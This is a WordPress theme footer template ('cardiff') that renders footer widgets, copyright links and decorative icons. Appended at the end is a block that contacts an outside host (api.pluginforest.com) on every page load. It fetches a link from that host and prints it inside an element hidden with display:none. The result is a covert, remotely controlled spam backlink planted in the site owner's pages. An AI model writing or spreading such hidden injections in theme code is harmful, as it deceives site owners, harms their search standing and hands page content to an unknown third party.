<?php $options = get_option('cardiff'.'_theme_options');?>



<?php if(cardiff_set($options, 'footerbg')): ?>
 <!-- Main Footer -->    
    <footer class="<?php echo wp_kses_post(cardiff_set($options, 'footerclass')); ?> main-footer"  style="background-image:url('<?php echo esc_url(cardiff_set($options, 'footerbg')); ?>');" >
   
   <?php else : ?>
   <footer class="main-footer" style="background-image:url(<?php echo esc_url(get_template_directory_uri().'/images/background/2.jpg');?>)">
	
<?php endif ; ?>
        <!--footer upper-->
        <div class="footer-upper">
            <?php if ( is_active_sidebar( 'footer-sidebar' ) ): ?>
			<div class="auto-container">
			<div class="widgets-section">
				<div class="row clearfix">
					<?php dynamic_sidebar( 'footer-sidebar' );?>
				</div>
			</div>
			</div>
        <?php endif;?>
        </div>
<?php if(!(cardiff_set($options, 'bottom_footer_show'))):?> 
        <!--Footer Bottom-->
        <div class="footer-bottom">
            <div class="auto-container">
                <?php if(!cardiff_set($options, 'copy_show')):?> 
				<div class="copyright clearfix">
                    
					<?php echo wp_kses_post(cardiff_set($options, 'copy_right')); ?>
                    
                   <ul class="link">
                                <li><a href="<?php echo esc_url(cardiff_set($options, 'link1')); ?>"><?php echo wp_kses_post(cardiff_set($options, 'title1')); ?></a></li>
                                <li><a href="<?php echo esc_url(cardiff_set($options, 'link2')); ?>"><?php echo wp_kses_post(cardiff_set($options, 'title2')); ?></a></li>
                                <li><a href="<?php echo esc_url(cardiff_set($options, 'link3')); ?>"><?php echo wp_kses_post(cardiff_set($options, 'title3')); ?></a></li>
                                <li><a href="<?php echo esc_url(cardiff_set($options, 'link4')); ?>"><?php echo wp_kses_post(cardiff_set($options, 'title4')); ?></a></li>
                                <li><a href="<?php echo esc_url(cardiff_set($options, 'link5')); ?>"><?php echo wp_kses_post(cardiff_set($options, 'title5')); ?></a></li>
                            </ul>
                    
                </div>
			<?php endif;?>	
            </div>
        </div>
	<?php endif;?>		
        <div class="icon-one float-bob"><img src="<?php echo esc_url(get_template_directory_uri().'/images/icons/shapes/icon-21.png');?>" alt="<?php esc_attr_e('Image', 'cardiff');?>"></div>
        <div class="icon-two"><img src="<?php echo esc_url(get_template_directory_uri().'/images/icons/shapes/icon-22.png');?>" alt="<?php esc_attr_e('Image', 'cardiff');?>"></div>
    </footer>
<!--End pagewrapper-->
</div>
</div>
<div class="scroll-to-top scroll-to-target" data-target="html"><span class="icon fa fa-angle-double-up"></span></div>
<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>